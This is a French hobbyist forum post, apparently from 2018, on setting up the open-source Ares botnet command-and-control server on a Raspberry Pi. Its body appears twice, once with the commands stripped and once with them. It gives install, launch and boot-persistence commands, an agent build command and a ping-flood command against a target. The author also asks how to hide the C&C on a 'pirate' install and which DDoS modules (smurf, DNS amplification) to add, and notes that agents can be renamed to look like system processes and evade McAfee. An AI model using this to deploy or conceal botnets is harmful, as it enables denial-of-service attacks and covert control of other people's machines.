Yo ! Alors dans mon premier post je vous avais expliqué que je voulais installé un C&C de botnet... sur mon Rasberry Pi !
Je suis sur que l'ont peu en trouver pleins, je me suis moi tourné vers Ares Botnet, un Botnet en Python =)
Pour ce qui n'ont pas lu le premier post en gros on a un RPI qui ce connect automatiquement a notre point d'accès;
Et démare les service demander (ssh/knockd/iptables)
Aller on ce lance !
Pour commencer j'ai choisi Ares Botnet car il est sur git hub et git hub c'est cool ! et surtout il est en python, simple, léger, mises à jour, le grand luxe quoi !
==> https://github.com/sweetsoftware/Ares
On telecharge ( git clone, wget, browser) et on suit le ReadMe:
Sur le RpI j'ai eu un léger souci de dépendances mais rapidement régler grace aux commandes proposées directement dans l'erreur, donc installation sans encombre vraiment.
Alors premier test on suit toujours le ReadMe:
Interface web du Botnet:
J'accede au C&C depuis mon Pc (réseau local) et n'importe qui, serait capable de voir la page d'accueil du C&C avec juste avec l'adresse + le port
Le problème c'est que si je ferme / filtre le port 8080 les Zombie ne peut plus se connecter... Je réfléchis encore à une solution de discrétion... si vous avez des idées !
Aprés quellques test, j'ai decider de metter un system de x11 foward pour pouvoir prendre le controle du C&C depuit ssh(Pour une utilisation a distance par exemple)
Il faut activer le x11 fowarding et Allow tcp foward en décommentant les lignes portant le méme nom dans /etc/ssh/sshd_config:
Ensuite on peu ce connecter en ssh avec l'option -X ( et pourquoi pas -C pour compresser ) et déporter l'affichage de notre navigateur :
Ici je déporte l'affichage du nabigateur epiphany, vous remarquerez que j'utilise 127.0.0.1 comme adresse car le navigateur s'executer sur le rpi c'est juste l'affichage qui est déporter !
Pour des raisons évidentes il faut maintenant que le serveur se lance au démarrage, pour ça il faut écrire une ligne dans /etc./network/rc local/
Petit plus, ajoutez une option dans votre MOTD pour afficher que Ares est bien up avec cette ligne (adaptez selon vos gouts ! ):
Bon avec cette config, même si il y a une coupure de courant ou internet le C&C se remettra en place tout seul et les zombies se reconnecteront !
Encore nous en faut-il un !
Donc toujours celon le ReadMe:
Puits on l'execute (ici le panel qui permet l'envoie de commande plusieurs/tout les zombies):
Capture d’écran de 2018-02-09 01-18-22.png
Ici la console pour un zombie precie :
Capture d’écran de 2018-02-09 01-18-33.png
Voila ca marche bien, j'ai pas plusieur machine pour simuler une attaque mais le principe est de faire executer une commande a tout les bots par exemple:
On pourrais faire du ICMP flood (Ping flood) avec quelque chose comme ca:
Tout dépendra evidement du nombres de zombies
Voilà sur quoi je planche actuellement:
Quel module serait-il intéressant de développé pour ce botnet ? (Un module smurf flood ? DNS par amplification ? system de redondance ?)
(Excluant tout module de spread / recherche d'objet connecter evidement, je spread avec ma micro SD vue que rien ne sort du local ! )
Comment le rendre discret / le protéger du réseau local dans le scénario d'une installation "pirate" ? (iptables/tunelling/ids/rajouter une Auth, etc.)
D'autres idées exotiques ?
Pour finir j'ai pu observer plusieurs choses:
1- L'agent lance deux processus qui porte le nom de l'agent. (agent1 dans l'exemple mais si on l'apel sytemc1 ou Kerne1.. )
2- Si le C&C ce coupe / crash ou autres, les agents ce mette en stand by et retry de ce co jusqu'au retour du C&C.
3- L'agent Linux reste impossible pour moi a executer dans un chroot "Dans android".. je ne c'est pourquoi..
(Peut étre faudrait il emboité un chroot dans un chroot dans android, dans un KFC.. mais pas sûr )
4- L'agent n'est pas deteceter par MacFee sécurité.
Je crois que c'est tout.. ca fait deja un gros pavé ^^ Peace,Kiss?,Love !
Je suis sur que l'ont peu en trouver pleins, je me suis moi tourné vers Ares Botnet, un Botnet en Python =)
Pour ce qui n'ont pas lu le premier post en gros on a un RPI qui ce connect automatiquement a notre point d'accès;
Et démare les service demander (ssh/knockd/iptables)
Aller on ce lance !
Pour commencer j'ai choisi Ares Botnet car il est sur git hub et git hub c'est cool ! et surtout il est en python, simple, léger, mises à jour, le grand luxe quoi !
==> https://github.com/sweetsoftware/Ares
On telecharge ( git clone, wget, browser) et on suit le ReadMe:
pip install -r requirements.txt
cd server ./ares.py initdb
cd server ./ares.py initdb
Alors premier test on suit toujours le ReadMe:
gunicorn ares:app -b 0.0.0.0:8080 --threads 20
Interface web du Botnet:
J'accede au C&C depuis mon Pc (réseau local) et n'importe qui, serait capable de voir la page d'accueil du C&C avec juste avec l'adresse + le port
Le problème c'est que si je ferme / filtre le port 8080 les Zombie ne peut plus se connecter... Je réfléchis encore à une solution de discrétion... si vous avez des idées !
Aprés quellques test, j'ai decider de metter un system de x11 foward pour pouvoir prendre le controle du C&C depuit ssh(Pour une utilisation a distance par exemple)
Il faut activer le x11 fowarding et Allow tcp foward en décommentant les lignes portant le méme nom dans /etc/ssh/sshd_config:
Ensuite on peu ce connecter en ssh avec l'option -X ( et pourquoi pas -C pour compresser ) et déporter l'affichage de notre navigateur :
Ici je déporte l'affichage du nabigateur epiphany, vous remarquerez que j'utilise 127.0.0.1 comme adresse car le navigateur s'executer sur le rpi c'est juste l'affichage qui est déporter !
Pour des raisons évidentes il faut maintenant que le serveur se lance au démarrage, pour ça il faut écrire une ligne dans /etc./network/rc local/
cd /home/VotreUser/Ares/server/ && sudo gunicorn ares:app -b 0.0.0.0:8080 --threads 20 &
`netstat -lntup | grep 8080 | awk '{print "Ares Status:"$4,$6}'`
Encore nous en faut-il un !
Donc toujours celon le ReadMe:
./builder.py -p Linux --server http://192.168.X.X:8080 -o agent
Capture d’écran de 2018-02-09 01-18-22.png
Ici la console pour un zombie precie :
Capture d’écran de 2018-02-09 01-18-33.png
Voila ca marche bien, j'ai pas plusieur machine pour simuler une attaque mais le principe est de faire executer une commande a tout les bots par exemple:
On pourrais faire du ICMP flood (Ping flood) avec quelque chose comme ca:
ping TARGET -C 5000
Voilà sur quoi je planche actuellement:
Quel module serait-il intéressant de développé pour ce botnet ? (Un module smurf flood ? DNS par amplification ? system de redondance ?)
(Excluant tout module de spread / recherche d'objet connecter evidement, je spread avec ma micro SD vue que rien ne sort du local ! )
Comment le rendre discret / le protéger du réseau local dans le scénario d'une installation "pirate" ? (iptables/tunelling/ids/rajouter une Auth, etc.)
D'autres idées exotiques ?
Pour finir j'ai pu observer plusieurs choses:
1- L'agent lance deux processus qui porte le nom de l'agent. (agent1 dans l'exemple mais si on l'apel sytemc1 ou Kerne1.. )
2- Si le C&C ce coupe / crash ou autres, les agents ce mette en stand by et retry de ce co jusqu'au retour du C&C.
3- L'agent Linux reste impossible pour moi a executer dans un chroot "Dans android".. je ne c'est pourquoi..
(Peut étre faudrait il emboité un chroot dans un chroot dans android, dans un KFC.. mais pas sûr )
4- L'agent n'est pas deteceter par MacFee sécurité.
Je crois que c'est tout.. ca fait deja un gros pavé ^^ Peace,Kiss?,Love !